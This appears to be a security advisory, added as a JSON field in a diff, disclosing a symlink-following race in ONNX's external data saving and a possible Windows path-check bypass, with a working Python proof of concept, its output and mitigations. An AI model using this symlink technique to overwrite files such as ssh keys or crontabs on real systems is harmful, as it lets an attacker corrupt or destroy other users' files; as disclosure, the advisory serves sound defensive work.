+ "details": "### Summary\n\nThe `save_external_data` method seems to include multiple issues introducing a local TOCTOU vulnerability, an arbitrary file read/write on any system. It potentially includes a path validation bypass on Windows systems.\nRegarding the TOCTOU, an attacker seems to be able to overwrite victim's files via symlink following under the same privilege scope.\nThe mentioned function can be found here: https://github.com/onnx/onnx/blob/main/onnx/external_data_helper.py#L188\n\n### Details\n\n#### TOCTOU\nThe vulnerable code pattern:\n```python\n # CHECK - Is this a file?\n if not os.path.isfile(external_data_file_path):\n # Line 228-229: USE #1 - Create if it doesn't exist\n with open(external_data_file_path, \"ab\"):\n pass\n \n # Open for writing\n with open(external_data_file_path, \"r+b\") as data_file:\n # Lines 233-243: Write tensor data\n data_file.seek(0, 2)\n if info.offset is not None:\n file_size = data_file.tell()\n if info.offset > file_size:\n data_file.write(b\"\\0\" * (info.offset - file_size))\n data_file.seek(info.offset)\n offset = data_file.tell()\n data_file.write(tensor.raw_data)\n```\nThere is a time gap between `os.path.isfile` and `open` with no atomic file creation flags (e.g. `O_EXCEL | O_CREAT`) allowing the attacker to create a symlink that is being followed (absence of `O_NOFOLLOW`), between these two calls. By combining these, the attack is possible as shown below in the PoC section.\n\n#### Bypass\nThere is also a potential validation bypass on Windows systems in the same method (https://github.com/onnx/onnx/blob/main/onnx/external_data_helper.py#L203) alloing absolute paths like `C:\\` (only 1 part):\n```python\nif location_path.is_absolute() and len(location_path.parts) > 1\n```\nThis may allow Windows Path Traversals (not 100% verified as I am emulating things on a Debian distro).\n\n### PoC\n\nInstall the dependencies and run this:\n```python\nmport os\nimport sys\nimport tempfile\nimport numpy as np\nimport onnx\nfrom onnx import TensorProto, helper\nfrom onnx.numpy_helper import from_array\n\n# Create a temporary directory for our poc\nwith tempfile.TemporaryDirectory() as tmpdir:\n print(f\"[*] Working directory: {tmpdir}\")\n\n # Create a \"sensitive\" file that we'll overwrite\n sensitive_file = os.path.join(tmpdir, \"sensitive.txt\")\n with open(sensitive_file, 'w') as f:\n f.write(\"SENSITIVE DATA - DO NOT OVERWRITE\")\n\n original_content = open(sensitive_file, 'rb').read()\n print(f\"[*] Created sensitive file: {sensitive_file}\")\n print(f\" Original content: {original_content}\")\n\n # Create a simple ONNX model with a large tensor\n print(\"[*] Creating ONNX model with external data...\")\n\n # Create a tensor with data > 1KB (to trigger external data)\n large_array = np.ones((100, 100), dtype=np.float32) # 40KB tensor\n large_tensor = from_array(large_array, name='large_weight')\n\n # Create a minimal model\n model = helper.make_model(\n helper.make_graph(\n [helper.make_node('Identity', ['input'], ['output'])],\n 'minimal_model',\n [helper.make_tensor_value_info('input', TensorProto.FLOAT, [100, 100])],\n [helper.make_tensor_value_info('output', TensorProto.FLOAT, [100, 100])],\n [large_tensor]\n )\n )\n\n # Save model with external data to create the external data file\n model_path = os.path.join(tmpdir, \"model.onnx\")\n external_data_name = \"data.bin\"\n external_data_path = os.path.join(tmpdir, external_data_name)\n\n onnx.save_model(\n model, \n model_path,\n save_as_external_data=True,\n all_tensors_to_one_file=True,\n location=external_data_name,\n size_threshold=1024\n )\n\n print(f\"[+] Model saved: {model_path}\")\n print(f\"[+] External data created: {external_data_path}\")\n\n # Now comes the attack: replace the external data file with a symlink\n print(\"[!] ATTACK: Replacing external data file with symlink...\")\n\n # Remove the legitimate external data file\n if os.path.exists(external_data_path):\n os.remove(external_data_path)\n print(f\" Removed: {external_data_path}\")\n\n # Create symlink pointing to sensitive file\n os.symlink(sensitive_file, external_data_path)\n print(f\" Created symlink: {external_data_path} -> {sensitive_file}\")\n\n # Now load and re-save the model, which will trigger the vulnerability\n print(\"Loading model and saving with external data...\")\n try:\n # Load the model (without loading external data)\n loaded_model = onnx.load(model_path, load_external_data=False)\n\n # Modify the model slightly (to ensure we write new data)\n loaded_model.graph.initializer[0].raw_data = large_array.tobytes()\n\n # Save again - this will call save_external_data() and follow the symlink\n onnx.save_model(\n loaded_model,\n model_path,\n save_as_external_data=True,\n all_tensors_to_one_file=True,\n location=external_data_name,\n size_threshold=1024\n )\n except Exception as e:\n print(f\"[-] Error: {e}\")\n \n # Check if the sensitive file was overwritten\n print(\"[*] Checking if sensitive file was modified...\")\n modified_content = open(sensitive_file, 'rb').read()\n \n print(f\" Original size: {len(original_content)} bytes\")\n print(f\" Current size: {len(modified_content)} bytes\")\n print(f\" Original content: {original_content[:50]}\")\n print(f\" Current content: {modified_content[:50]}...\")\n print()\n \n if modified_content != original_content:\n print(\"[!] Success!\")\n else:\n print(\"[-] Failure\")\n```\nOutput:\n```\n[*] Working directory: /tmp/tmpqy7z88_l\n[*] Created sensitive file: /tmp/tmpqy7z88_l/sensitive.txt\n Original content: b'SENSITIVE DATA - DO NOT OVERWRITE'\n\n[*] Creating ONNX model with external data...\n[+] Model saved: /tmp/tmpqy7z88_l/model.onnx\n[+] External data created: /tmp/tmpqy7z88_l/data.bin\n[!] ATTACK: Replacing external data file with symlink...\n Removed: /tmp/tmpqy7z88_l/data.bin\n Created symlink: /tmp/tmpqy7z88_l/data.bin -> /tmp/tmpqy7z88_l/sensitive.txt\nLoading model and saving with external data...\n[*] Checking if sensitive file was modified...\n Original size: 33 bytes\n Current size: 40033 bytes\n Original content: b'SENSITIVE DATA - DO NOT OVERWRITE'\n Current content: b'SENSITIVE DATA - DO NOT OVERWRITE\\x00\\x00\\x80?\\x00\\x00\\x80?\\x00\\x00\\x80?\\x00\\x00\\x80?\\x00'...\n```\nSuccessfully overwritting the \"sensitive data\" file.\n\n### Impact\nThe impact may include filesystem injections (e.g. on ssh keys, shell configs, crons) or destruction of files, affecting integrity and availability.\n\n### Mitigations\n1. Atomic file creation\n2. Symlink protection\n3. Path canonicalization",
0 commit comments